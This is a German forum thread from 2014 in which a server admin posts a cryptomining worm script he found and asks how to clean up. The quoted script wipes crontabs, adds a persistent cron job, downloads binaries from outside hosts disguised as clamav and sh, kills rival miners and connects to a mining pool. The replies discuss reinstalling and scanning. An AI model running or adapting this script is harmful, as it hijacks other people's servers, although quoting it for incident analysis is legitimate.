Schadscript ausgeführt

kameltreiber84 · 4. Januar 2014

Ich habe folgendes Script auf meinem Server entdeckt:

Bash

#!/bin/sh
crontab -r
cd /tmp
rm -rf a* c* update*
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
wget http://www.pigicrm.com/a >> /dev/null &&
chmod u+x update
rm -rf /etc/cron.hourly/update




cp update /etc/cron.hourly/
chattr -ia bash
chattr -ia *
wget http://70.32.88.93/clamav
wget http://70.32.88.93/sh
chmod +x sh
chmod +x clamav
mv clamav bash
kill -9 `ps x|grep miner|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep stratum|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep apacheX|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep pwnnetd3|grep -v grep|awk '{print $1}'`
PATH="." bash -o stratum+tcp://pool.linuxd.net:3333 -O DeBil.1:x -B
PATH="." sh -o stratum+tcp://pool.linuxd.net:3333 -O DeBil.1:x -B
chattr +ia bash
chattr +ia sh

Alles anzeigen

Meine Crontabs waren folgendermaßen verändert:

Code

* * * * * /tmp/mc-root/update >/dev/null 2>&1

Wer kann sehen welchen Schaden dies nun ausgelöst hat und wie ich das bestmöglich beheben kann? Danke!

PS: Alle Vorkomnisse der falschen Cron-Kommandos, der update Datrein und der Ordner mech.dir habe ich nun gelöscht.

extremmichi · 4. Januar 2014

also es wird deine bash und sh übernommen .
Was die einzelnen Dateien nun machen kann ich nicht sagen ,
Nutzt zwar erst was wenn du herausgefunden hast, wie du infiziert wurdest
aber ich würde in jedem Fall eine Neuinstallation empfehlen.

gruss

michi
EDIT:
viel war nicht aber ich hab das hier gefunden
Bitcoin Mining Wurm
vielleicht bringt es dich weiter

vmk · 4. Januar 2014

Die bash wird nicht übernommen. Es wird nur eine Datei mit dem Namen runtergeladen und dann ausgeführt aus /tmp.

Blaster · 4. Januar 2014

rootkithunter ist sehr vorbeugend das dein system auf sowas abcheckt aber ich denke du hast dein eigenes Sicherheitskonzept

kameltreiber84 · 5. Januar 2014

Danke soweit. Mich würde mal interessieren: Was passier mit clamav oder sh? Werden die ausgetauscht?

Blaster · 5. Januar 2014

Bei clamav spuckt Google aus das es eine Antivirus software ist .. seltsam eigentlich SH kann alles sein. Würde das mal beobachten, welche Sicherheitsvorkehrungen hast du auf den Server eigentlich getroffen bzw. was benutzt du zum sichern deines Systems ?

extremmichi Eine Neuinstallation muss doch nicht immer gleich sofort gemacht werden nur weil mein System infiziert worden ist oder ? Wie stellst du dir das z.B. im Bankwesen an ? Ach du Schande da ist ein Trojaner lass uns doch das ganze System samt Kundendaten einfach Platt machen und neu hoch ziehen (Kunden freuen sich ). Würde ehr ausfindig machen wie das Script auf dem Server gekommen ist, und wie ich das Leck schließen kann.

KB19 · 5. Januar 2014

Habt ihr den Code vom Script überhaupt gelesen oder versteht ihr den einfach nicht? Ist ja schlimm, was da teilweise an Antworten kommt – vmk's Beitrag einmal ausgenommen…

Zurück zum Thema: Wenn dieses Script wirklich als root ausgeführt worden ist, ist alles weitere relativ sinnlos, da quasi alles passiert sein könnte. Neuinstallation und aus. Selbst wenn man die heruntergeladenen Dateien analysiert, könnte der Inhalt vor x Tagen ganz anders gewesen sein. Da macht es keinen Sinn weiter rum zu basteln. Alles sichern, möglichst die Schwachstelle finden, Lösung erarbeiten und alles neu einrichten. That's it. Falls das nicht als root lief, dürfte der Großteil davon schief gelaufen sein. Dann kann man über eine normale Lösung weiterreden, die ohne Neuinstallation auskommt. Aber so hört es sich nach den Schilderungen über die entfernten Dateien leider nicht an.

@Blaster: Und der Vergleich mit den Banken ist nicht dein Ernst, oder?

MfG Christian

kameltreiber84 · 5. Januar 2014

Vielen Dank.

Fakt ist:

Es wird wiederum ein Script heruntergeladen. Dieses Script ist exakt das gleiche welches hier ausgeführt wird. Es ist generell möglich das in der Vergangenheit so ein anderes Script geladen und ausgeführt wurde.
Das Script hat neue udn vermeintlich infizierte Versionen von clamav und sh heruntergeladen und integriert.
Das Sctipt hat Crontabs modifiziert (z.B. /etc/cron.hourly/update)

Ich kann das System leider ohne weiteres nicht neu installieren. Die meisten Schaddateien habe ich zumindest manuell entfernt. Clamav habe ich deinstalliert und wieder insrtalliert. SH bleibnt eventuell infiziert. Wenn der Angreifer das Script der HTTP in der Vergangenheit ausgewechselt hat, ist "alles" weitere möglich.

Sehr interessant ist in diesem Zusammenhang, dass genau dies wirklich ein Bitcoining Wurm zu sein scheint:
Bitcoin Mining Wurm

Demnach löst ein Dist-upgrade von Debian 6 auf Debian 7 das Problem vollständig, Ich werde danach nochmals mit rkhunter und dem neuen clamscan scannen. Ein Restrisiko ist nicht auszuschließen

exii88 · 5. Januar 2014

Ich würde sagen es bleibt nichts anderes übrig als eine Neuinstallation, natürlich mit Sicherung der notwendigen Daten.

Keiner kann hier sagen was durch die Infizierung verändert wurde und was der Angreifer bereits selbst verändert hat.

Ich persönlich finde es schon fast fahrlässig, so ein infiziertes System einfach laufen zu lassen und zu hoffen das man alles gelöscht hat... Ist nur meine Meinung..

kameltreiber84 · 5. Januar 2014

Korrekt, sauber ist wohl nur die Neuinstallation...

stachi · 5. Januar 2014

Wie hier bereits jemand geschrieben hat, handelt es sich um einen Bitcoin Mining Wurm. So wie das Script da aussieht wird weder clamav, bash oder sh ersetzt. Das Script arbeitet in der Form nur in /tmp. Es lädt die Dateien clamav und sh in das akuelle Verzeichnis (in diesem Fall /tmp) und macht sie ausführbar. Dann wird clamav in bash umbenannt. Anschließend werden die Programme gestartet und verbinden sich zu einem Mining Pool. Die Binaries bleiben im aktuellem Verzeichnis und ersetzen keine System Dateien. Sie werden nur so genannt, weil sie in der Prozessliste nicht auffallen sollen. Außerdem aktualisiert sich das Script über den angelegten Cronjob ständig selber, genauso wie die Binaries.

Man kann natürlich trotzdem nicht sicher sein, das nicht mehr passiert ist. Das Script kann jederzeit ein anderes gewesen sein und auch beliebig andere Binaries geladen haben.

perryflynn · 5. Januar 2014

Was manche "Experten" hier von sich geben... Oh man...

Zusätzlich zu den Ausführungen von vmk und stachi, kann man auch nicht sicher sein was die Vermeidlichen clamav und bash Programme machen. Diese könnten auch etwas nachgeladen haben. Wer weiß ob es nur ein Mining Wurm ist und nicht noch mehr im System versteckt hat?

Absolutes Minimum wäre mal rkhunter durchlaufen zu lassen, und das im Rettungssystem.
Aber ich persönlich könnte erst nach einer Neuinstallation wieder ruhig schlafen.

lovelins12 · 7. Januar 2014

Also clamav und sh werden beide als bitccoinminer erkannt laut virustotal.
Also ich denke er sollte einfach die datein und den cronjob löschen und zudr no0t dann wie perryflynn es gesagt hat mit rkhunter durchsuchen lassen

WolfgangV · 28. September 2014

Ähhm, auch wenn ich jetzt der gefühlt 1000ste bin der das sagt: Mach den Server platt!

Hier die Begründung:
- es wurden dir unbekannte binaries auf dein System geladen und ausgeführt, welche Effekte diese hatten weißt du nicht
Du kannst dein System von "innen" heraus nicht reparieren da du KEINER deiner dort vorhandenen Binaries trauen kannst, weiter ist ein Scan von außen mit 100%iger Tiefe von sehr aufwändig bis unmöglich zu bewerten....
Nebenher bemerkt hat das Ding u.U. Sachen gelöscht die für den (sicheren) Betrieb deines Servers ganz gut wären... dein alter Crontab z.B. ist ja auch weg (crontab -r).... also wenn ich einen Virus/Worm vertreiben wollen würde, würde z.B. überlegen ob ich meinen Opfern nicht z.B. die Möglichkeit updates zu fahren nehmen würde... oder alle paar Tage / Wochen lässt man sich einen Log des Servers zustellen in dem vielleicht interessante Daten zu finden sind (nicht in deinem Interesse wie ich vermute) oder ..... die Möglichkeiten sind unbegrenzt.

Lässt du den Server in gutem Glauben an "es war hoffentlich nicht mehr" weiterlaufen und wird dieser z.B. für Straftaten verwendet (häßliche Themen wie Kinderpornographie die verteilt wird etc.) dann bist du mindestens grob fahrlässig.... da du es spätestens nach diesen Foreneinträgen besser wissen MUSST.

Von daher ganz klar: Daten sichern (zieh dir z.B. ein Image für eine virtuelle Maschine) und das Ding in den Äther gejagt.

gemini · 28. September 2014

Ist die Antwort nicht mittlerweile schon reichlich spät? Der Thread wurde schließlich Anfang des Jahres eröffnet

WolfgangV · 28. September 2014

*schäm* ..... mein Fehler, hatte ich nicht drauf geachtet - war irgendwie im "Shellshock" Wahn und da kam der Thread natürlich genau richtig. Sorry!